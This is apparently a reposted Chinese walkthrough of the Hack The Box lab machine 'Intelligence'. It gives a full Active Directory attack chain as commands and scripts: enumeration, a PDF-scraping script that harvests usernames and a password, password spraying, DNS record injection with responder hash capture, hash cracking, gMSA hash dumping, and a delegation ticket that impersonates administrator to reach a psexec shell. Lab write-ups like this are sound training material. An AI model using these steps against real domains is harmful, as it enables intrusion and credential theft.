【Hack The Box】windows练习-- Intelligence

news2024/11/24 19:17:18

HTB 学习笔记

【Hack The Box】windows练习-- Intelligence


🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年9月7日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章目录

  • HTB 学习笔记
    • 信息收集
    • 我看smb
    • 我看dns
    • 我看ldap
    • 我看web80
    • 我看88Kerberos
    • pdf
    • 密码喷洒
    • 内网分析
    • smb
    • 白银票据

在这里插入图片描述

信息收集

53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-08-13 08:43:33Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-08-13T08:44:54+00:00; +7h03m18s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-08-13T08:44:54+00:00; +7h03m18s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-08-13T08:44:54+00:00; +7h03m18s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-08-13T08:44:54+00:00; +7h03m18s from scanner time.
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

53的dns,80的web,88的ker,rpc,smb,ldap,445
464/tcp open kpasswd5?
9389/tcp open mc-nmf
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
(Domain: intelligence.htb0., Site: Default-First-Site-Name)
commonName=dc.intelligence.htb

根据 IIS 版本 ,主机至少为 Windows 10 / Server 2016+。 DNS、Kerberos 和 LDAP 的组合表明这是一个 Windows 域控制器。 此外,对于 Kerberos,如果我设法找到用户名,我可以尝试 ASREP-roasting,如果我找到 creds,我可以尝试 Kerberoasting。

我看smb

smbmap -H 10.10.10.248 
[+] IP: 10.10.10.248:445        Name: 10.10.10.248                                      
smbmap -H 10.10.10.248 -u 0xdf -p 0xdf
[!] Authentication error on 10.10.10.248

smbclient -N -L //10.10.10.248
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
SMB1 disabled -- no workgroup available

要不起

我看dns

dig @10.10.10.248 intelligence.htb
dig axfr @10.10.10.248 intelligence.htb
dnsenum --dnsserver 10.129.95.154 -f /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -o scans/dnsenum-bitquark-intelligence.htb intelligence.htb

在这里插入图片描述
dc.intelligence.htb
加入host

我看ldap

ldapsearch -H ldap://10.129.95.154 -x -s base namingcontexts
ldapsearch -H ldap://10.129.95.154 -x -b DC=intelligence,DC=htb
ldapsearch -H ldap://10.129.95.154 -x -b DC=intelligence,DC=htb "(objectClass=person)" |   grep "sAMAccountName:"

啥也没有

我看web80

在这里插入图片描述
contact@intelligence.htb

还有两个文档,我完全看不懂,带着翻译都看不懂
不知所云,狗屁不通
目录爆破也什么都没有
但是鉴于这两个文件可以下载,我准备下载下来分析一下

oxdf@parrot$ exiftool 2020-01-01-upload.pdf
ExifTool Version Number         : 12.16
File Name                       : 2020-01-01-upload.pdf
Directory                       : .
File Size                       : 26 KiB
File Modification Date/Time     : 2021:08:14 20:29:29-04:00
File Access Date/Time           : 2021:08:14 20:29:59-04:00
File Inode Change Date/Time     : 2021:08:14 20:29:50-04:00
File Permissions                : rwxrwx---
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.5
Linearized                      : No
Page Count                      : 1
Creator                         : William.Lee
oxdf@parrot$ exiftool 2020-12-15-upload.pdf 
ExifTool Version Number         : 12.16
File Name                       : 2020-12-15-upload.pdf
Directory                       : .
File Size                       : 27 KiB
File Modification Date/Time     : 2021:08:14 20:33:36-04:00
File Access Date/Time           : 2021:08:14 20:33:36-04:00
File Inode Change Date/Time     : 2021:08:14 20:33:37-04:00
File Permissions                : rwxrwx---
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.5
Linearized                      : No
Page Count                      : 1
Creator                         : Jose.Williams

发现了用户
William.Lee
Jose.Williams
并且把他们放到user文本中

我看88Kerberos

把刚才的那两个用户放进去,同时还要在多放几个版本的
比如LWilliam,wLee这样子的,外国人咋起名字咱也不懂,反正就这几种

./kerbrute_linux_amd64 userenum --dc 10.10.10.248 -d intelligence.htb user

在这里插入图片描述

GetNPUsers.py -no-pass -dc-ip 10.129.95.154 intelligence.htb/Jose.Williams

在这里插入图片描述

pdf

查看网站上 PDF 的文件名,文件名符合模式 YYYY-MM-DD-upload.pdf. 有理由认为网站上可能存在未链接的相同格式的 PDF。 我将编写一个简短的 Python 脚本来查找相同格式的其他 PDF:
这里我卡住了,借用大神的思路以及脚本,真的牛

#!/usr/bin/env python3

import datetime
import requests


t = datetime.datetime(2020, 1, 1)  
end = datetime.datetime(2021, 7, 4) 

while True:
    url = t.strftime("http://intelligence.htb/documents/%Y-%m-%d-upload.pdf")  
    resp = requests.get(url)
    if resp.status_code == 200:
        print(url)
    t = t + datetime.timedelta(days=1)
    if t >= end:
        break

在这里插入图片描述

#!/usr/bin/env python3

import datetime
import io
import PyPDF2
import requests
t = datetime.datetime(2020, 1, 1)
end = datetime.datetime(2021, 7, 4)
keywords = ['user', 'password', 'account', 'intelligence', 'htb', 'login', 'service', 'new']
users = set()
while True:
    url = t.strftime("http://intelligence.htb/documents/%Y-%m-%d-upload.pdf")
    resp = requests.get(url)
    if resp.status_code == 200:
        with io.BytesIO(resp.content) as data:
            pdf = PyPDF2.PdfFileReader(data)
            users.add(pdf.getDocumentInfo()['/Creator'])
            for page in range(pdf.getNumPages()):
                text = pdf.getPage(page).extractText()
                if any([k in text.lower() for k in keywords]):
                    print(f'==={url}===\n{text}')
    t = t + datetime.timedelta(days=1)
    if t >= end:
        break

with open('users', 'w') as f:
    f.write('\n'.join(users)) 

更改一下,遍历出所有敏感字符,输出到users
在这里插入图片描述发现了密码,同时user也成功输入进了所有user信息

在这里插入图片描述

密码喷洒

ker中所有用户全部存在
接下来试试smb等

crackmapexec smb 10.10.10.248 -u users -p NewIntelligenceCorpUser9876 --continue-on-success

在这里插入图片描述smbmap -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -H 10.129.95.154
在这里插入图片描述
然后登陆进了smb,枚举到了信息

在这里插入图片描述

内网分析

bloodhound-python -c ALL -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -d intelligence.htb -dc intelligence.htb -ns 10.129.95.154

但是啥都没有

smb

smbclient -U Tiffany.Molina //10.129.95.154/IT NewIntelligenceCorpUser9876

我们去it组织再枚举一下,发现了一个ps1脚本
在这里插入图片描述高到本地来查看一下
在这里插入图片描述
该脚本进入 LDAP 并获​​取所有计算机的列表,然后遍历名称以“web”开头的计算机。 它将尝试向该服务器发出 Web 请求(使用正在运行的用户的凭据),如果状态码不是 200,它将通过电子邮件发送给 Ted.Graves 并让他们知道主机已关闭。 顶部的评论说它计划每五分钟运行一次。

https://github.com/dirkjanm/krbrelayx

-u intelligence\\Tiffany.Molina- 认证为的用户;
-p NewIntelligenceCorpUser9876- 用户密码;
--action add- 添加新记录;
--record web-0xdf- 要添加的域;
--data 10.01.14.19- 要添加的数据,在这种情况下,是要解析 web-0xdf 的 IP;
--type A- 要添加的记录类型。
python3 dnstool.py -u intelligence\\Tiffany.Molina -p NewIntelligenceCorpUser9876 --action add --record webrong --data 10.10.14.8 10.129.95.154

本地开启icmp监听
sudo responder -I tun0

在这里插入图片描述

在这里插入图片描述

john --wordlist=/usr/share/wordlists/rockyou.txt ted.graves.hash

在这里插入图片描述
Mr.Teddy (Ted.Graves)

白银票据

在这里插入图片描述
我们分析一下结构,ted用户是it组成员,it组成员对svc用户有ReadGMSAPassword,而后svc用户对dc有组托管

https://github.com/micahvandeusen/gMSADumper

python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb
这将会得到一个hash,我们不必破解他,因为下一步可以直接带着hash执行
 

在这里插入图片描述

80c1d736d9988b5763b9aa74362db287

下一步我们需要利用AllowedToDelegate

-dc-ip 10.10.10.248
-spn www/dc.intelligence.htb- SPN(见下文)
-hashes :5e47bac787e5e1970cf9acdb5b316239- 我之前收集的 NTLM
-impersonate administrator- 我想要一张票的用户
intelligence.htb/svc_int- 我正在运行的帐户

spn我们可以在对应用户的Allowed To Delegate 中获得
在这里插入图片描述

getST.py -dc-ip 10.129.95.154 -spn www/dc.intelligence.htb -hashes :80c1d736d9988b5763b9aa74362db287 -impersonate administrator intelligence.htb/svc_int

-impersonate administrator- 我想要一张票的用户
在这里插入图片描述sudo ntpdate 10.129.163.131

在这里插入图片描述

export KRB5CCNAME=administrator.ccache
echo "10.129.163.131 dc.intelligence.htb" >> /etc/hosts
klist

python3 /usr/share/doc/python3-impacket/examples/psexec.py -k -no-pass dc.intelligence.htb

在这里插入图片描述在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/13638.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

C++11更新内容(2)--完美转发--默认移动构造/移动赋值--1116

1.完美转发 1.1万能引用 void Fun(int &x){ cout << "左值引用" << endl; } void Fun(const int &x){ cout << "const 左值引用" << endl; }void Fun(int &&x){ cout << "右值引用" << e…

分布式数据库Cassandra

目录 一、概述 1、简介 2、架构 3、使用场景 二、安装 三、基本概念 1、数据模型 列&#xff08;Column&#xff09; 列族 KeySpace 节点&#xff08;Node&#xff09; 集群&#xff08;Cluster&#xff09; 2、数据类型 基础类型 集合类型 自定义数据类型 …

Linux开发工具(3)——gcc/g++

文章目录Linux编译器——gcc/g程序编译背景知识gcc指令动态链接和静态链接Linux下运行其他语言Linux编译器——gcc/g 程序编译背景知识 程序的编译分为四步&#xff1a; 预处理&#xff1a;主要完成的是&#xff0c;头文件展开&#xff0c;宏替换&#xff0c;注释删除&#x…

基于Matlab使用GPU和代码加速杂波模拟(附源码)

目录 一、杂波模拟 二、比较杂波模拟时间 三、其他仿真时序结果 四、总结 五、程序 此示例演示如何在图形处理单元 &#xff08;GPU&#xff09; 上或通过代码生成 &#xff08;MEX&#xff09; 而不是 MATLAB 解释器来模拟混乱。该示例将样本矩阵反演 &#xff08;SMI&am…

DVWA靶场在sql注入联合查询时返回报错信息 “Illegal mix of collations for operation ‘UNION’ ”之解决

比如我们输入&#xff1a; -1 union select 1,table_name from information_schema.tables where table_schemadvwa#会跳出一个页面出现报错提示&#xff1a; Illegal mix of collations for operation UNION这是由于union连接数据库中的字段的字符规则不一样导致的错误&…

MySQL—Apache+PHP+MySQL实现网上社区

ApachePHPMySQL实现网上社区 所谓网上社区是指包括BBS/论坛、聊天室、博客等形式在内的网上交流空间&#xff0c;同一主题的网上社区集中了具有共同兴趣的访问者&#xff0c;由于有众多用户的参与&#xff0c;因此具备了交流的功能&#xff0c;成为一个营销场所。网上社区有各…

高质量实现单文件导入、导出功能(使用EasyExcel )

前言 咋说呢&#xff0c;最近交接了一个XXX统计分析系统到我手上&#xff0c;显示页面平平无其&#xff0c;一看导入、导出功能的实现代码&#xff0c;每个小菜单目录里面都对应一个导入导出接口&#xff0c;看起来十分难受&#xff01;&#xff08;此处省略1w字内心os&#xf…

Neo4j安装与配置

注意&#xff1a;在安装Neo4j之前要安装JAVA SE的SDK。 1. 下载Neo4j 企业版本的收费的&#xff0c;社区版本是免费的。我下载的是社区版本。 社区版本下载地址&#xff1a;https://neo4j.com/download-center/#community 我下载的是3.5.35 下载好以后是zip文件&#xff0c;…

vulnhub靶机raven1

靶机下载地址&#xff1a;Raven: 1 ~ VulnHub Kali ip&#xff1a;192.168.174.128 靶机ip&#xff1a;192.168.174.131 实验思路&#xff1a;靶机ip发现&#xff0c;端口扫描&#xff0c;wordpress用户枚举和爆破&#xff0c;ssh爆破&#xff0c;MySQL登录&#xff0c;pyth…

云计算存储虚拟化技术

存储虚拟化是指将具体的存储设备或存储系统与服务器操作系统分隔开&#xff0c;为存储用户提供一个统一的虚拟存储池。 在面对资源池按需分配、多租户、海量存储、高I/O、快速扩展、差异化服务等需求时&#xff0c;传统的存储方式面临的挑战日益明显&#xff0c;存储成本高、并…

kali(linux)安装fscan

fscan 是一个内网综合扫描工具&#xff0c;方便一键自动化、全方位漏洞扫描。 它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。 源码链接&#xff…

2022.11.17 HDU-4911 Inversion

bobo has a sequence a1,a2,…,an. He is allowed to swap two adjacent numbers for no more than k times. Find the minimum number of inversions after his swaps. Note: The number of inversions is the number of pair (i,j) where 1≤i<j≤n and ai>aj. Input T…

node篇 CommonJS规范

文章目录1. 每个文件就是一个模块&#xff0c;有自己的作用域。在一个文件里面定义的变量、函数、类&#xff0c;都是私有的&#xff0c;对其他文件不可见。2. 每个模块内部&#xff0c;module变量代表当前模块。3. 两种导出方式 exports 和 module.exports4. 一种引入方式 req…

腾讯云轻量应用服务器搭配WordPress程序使用宝塔面板一键式搭建个人博客网站

你想要拥有一个自己的网站吗&#xff0c;不在受第三方网站的约束&#xff0c;自由撰写文章帖子&#xff0c;随时随地发挥你的想象。其实搭建一个个人网站没有那么麻烦&#xff0c;完全小白用户也可以办到&#xff0c;只需要点点鼠标就可以完成&#xff0c;下面就详细介绍使用腾…

计网实验软件 Cisco Packet Tracer 8 获取并汉化

1. 注册账号 点击&#xff1a;https://skillsforall.com/course/getting-started-cisco-packet-tracer 进入 Skills for All 网站. 点击 Get Started&#xff0c;进入登录页 点击 Sign Up 注册&#xff0c;选择国家、出生年月&#xff0c;填写其他信息。 这里顺带放一下密码的…

HOOPS/QT集成指南

引言 以下部分&#xff0c;说明如何使用QtGUI工具包和HOOPS 3D应用程序框架构建应用程序。首先回顾编译/链接&#xff0c;然后讨论各个组件中的对象关系&#xff0c;然后概述正确创建和初始化对象以及启动Qt事件循环所需的编程步骤。 开发人员应该首先编译、链接和运行基本的q…

【11-导入人人generator项目并自动生成相关的文件商品子模块的调试公共模块common子模块的抽离与实现Lombok插件的安装】

一.知识回顾 【0.三高商城系统的专题专栏都帮你整理好了&#xff0c;请点击这里&#xff01;】 【1-系统架构演进过程】 【2-微服务系统架构需求】 【3-高性能、高并发、高可用的三高商城系统项目介绍】 【4-Linux云服务器上安装Docker】 【5-Docker安装部署MySQL和Redis服务】…

UDS知识整理(四):ECU复位——0x11服务

目录 一、0x11服务&#xff08;ECU复位&#xff09;简介 二、0x11服务信息格式 &#xff08;1&#xff09;请求格式 &#xff08;2&#xff09;正响应格式 &#xff08;3&#xff09;负响应格式 三、0x11服务举例 &#xff08;1&#xff09;如&#xff1a;硬件复位 &am…

戴尔PowerEdge R650服务器荣获国家级实验室5项证书

在今年的戴尔科技峰会上&#xff0c;IDC中国副总裁兼首席分析师武连峰的报告引起了广泛关注&#xff0c;他表示&#xff1a; “根据IDC对全球企业CEO调研&#xff0c;在CEO关注的重点中&#xff0c;技术依然排在第一位&#xff0c;然后是效率和增长。88%的全球CEO在2022年会维…

[附源码]java毕业设计龙虎时代健身房管理系统

项目运行 环境配置&#xff1a; Jdk1.8 Tomcat7.0 Mysql HBuilderX&#xff08;Webstorm也行&#xff09; Eclispe&#xff08;IntelliJ IDEA,Eclispe,MyEclispe,Sts都支持&#xff09;。 项目技术&#xff1a; SSM mybatis Maven Vue 等等组成&#xff0c;B/S模式 M…